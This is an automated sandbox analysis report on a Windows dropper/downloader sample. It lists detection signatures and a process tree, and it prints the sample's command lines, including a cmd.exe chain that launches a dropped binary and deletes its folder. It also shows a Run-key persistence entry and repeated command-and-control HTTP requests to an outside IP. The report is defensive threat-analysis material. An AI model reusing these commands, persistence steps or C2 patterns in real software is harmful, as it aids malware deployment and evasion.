Windows Analysis Report
otsIBG7J9b.exe

Overview

General Information

Sample name: otsIBG7J9b.exe (renamed because original name is a hash value)
Original sample name: 04cc92b4e0f79ba841ba3c76651c8968d6525d4805829dd875f7a34034ffa460.exe
Analysis ID: 1573196
MD5: 8a971e9fe9fa2c3005ee1eb9c143b331
SHA1: 80260d696b4a945acddb747c3beb97604a060d70
SHA256: 04cc92b4e0f79ba841ba3c76651c8968d6525d4805829dd875f7a34034ffa460
Tags: 104-21-50-174, exe, user-JAMESWT_MHT
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Contains functionality to infect the boot sector
Creates an autostart registry key pointing to binary in C:\Windows
Deletes itself after installation
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries disk data (e.g. SMART data)
Uses known network protocols on non-standard ports
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Abnormal high CPU Usage
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • otsIBG7J9b.exe (PID: 3140 cmdline: "C:\Users\user\Desktop\otsIBG7J9b.exe" MD5: 8A971E9FE9FA2C3005EE1EB9C143B331)
    • cmd.exe (PID: 3652 cmdline: cmd.exe /c ping 127.0.0.1 -n 2&c:\ufcpp.exe "C:\Users\user\Desktop\otsIBG7J9b.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 2180 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • ufcpp.exe (PID: 2916 cmdline: c:\ufcpp.exe "C:\Users\user\Desktop\otsIBG7J9b.exe" MD5: 1B4C7D94BCF61F9CCE0B29C2D879EE73)
        • rundll32.exe (PID: 6644 cmdline: c:\windows\system32\rundll32.exe "c:\agtve\yhnvs.dll",init c:\ufcpp.exe MD5: 889B99C52A60DD49227C5E485A016679)
  • rundll32.exe (PID: 3384 cmdline: "C:\windows\SysWOW64\rundll32.exe" "c:\agtve\yhnvs.dll",init MD5: 889B99C52A60DD49227C5E485A016679)
    • cmd.exe (PID: 7020 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\agtve" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 2996 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • rundll32.exe (PID: 6104 cmdline: "C:\windows\SysWOW64\rundll32.exe" "c:\agtve\yhnvs.dll",init MD5: 889B99C52A60DD49227C5E485A016679)
    • cmd.exe (PID: 3732 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\agtve" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 3756 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup
No configs have been found
No yara matches
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: c:\windows\SysWOW64\rundll32.exe "c:\agtve\yhnvs.dll",init, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 6644, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EvtMgr
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-11T16:24:39.390346+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49780 | 202.108.0.52 | 80 | TCP
2024-12-11T16:24:42.096696+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49808 | 202.108.0.52 | 80 | TCP
2024-12-11T16:24:46.116860+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49844 | 202.108.0.52 | 80 | TCP

AV Detection

Source: otsIBG7J9b.exe, Avira: detected
Source: C:\ufcpp.exe, Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\agtve\yhnvs.dll, ReversingLabs: Detection: 92%
Source: otsIBG7J9b.exe, ReversingLabs: Detection: 86%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\ufcpp.exe, Joe Sandbox ML: detected
Source: C:\agtve\yhnvs.dll, Joe Sandbox ML: detected
Source: otsIBG7J9b.exe, Joe Sandbox ML: detected
Source: otsIBG7J9b.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\rundll32.exe, File created: c:\agtve\ReadMe.txt
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:49854 version: TLS 1.2
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_1000B0A0 lstrcpy, lstrcat, lstrcat, lstrcat, FindFirstFileA, FindNextFileA, rand, lstrcpy, lstrcat, lstrcat, _strcmpi, GetTickCount, srand, rand, rand, rand, rand, rand, rand, rand, rand, wsprintfA, wsprintfA, Sleep, wsprintfA, Sleep, strchr, strchr, strchr, strchr, atoi, DeleteFileA, Sleep, lstrcat, FindNextFileA, FindClose
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_100052A0 FindFirstFileA, wsprintfA, wsprintfA, FindNextFileA, FindClose
Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

Networking

Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 202.108.0.52 80
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 107.163.241.232 12354
Source: global traffic, TCP traffic: 107.163.241.232 ports 1,2,3,4,5,12354
Source: unknown, Network traffic detected: HTTP traffic on port 49753 -> 12354
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: global traffic, TCP traffic: 192.168.2.4:49753 -> 107.163.241.232:12354
Source: Joe Sandbox View, IP Address: 202.108.0.52
Source: Joe Sandbox View, ASN Name: TAKE2US
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49780 -> 202.108.0.52:80
Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49754 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49805 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49771 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49790 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49826 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49823 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49808 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49753 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49788 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49807 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49845 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49861 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49844 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49947 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49860 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49932 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50064 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49876 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50131 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50086 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50027 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49842 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49910 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50147 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50008 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49895 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49985 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50129 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50048 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49949 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50066 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50195 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50223 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50046 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49969 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49913 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50429 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50270 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50470 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50563 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50324 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50295 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50226 -> 107.163.241.232:12354
Source: global traffic HTTP traffic detected: GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Connection: Keep-Alive Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global traffic HTTP traffic detected: GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn
Source: global traffic HTTP traffic detected: GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
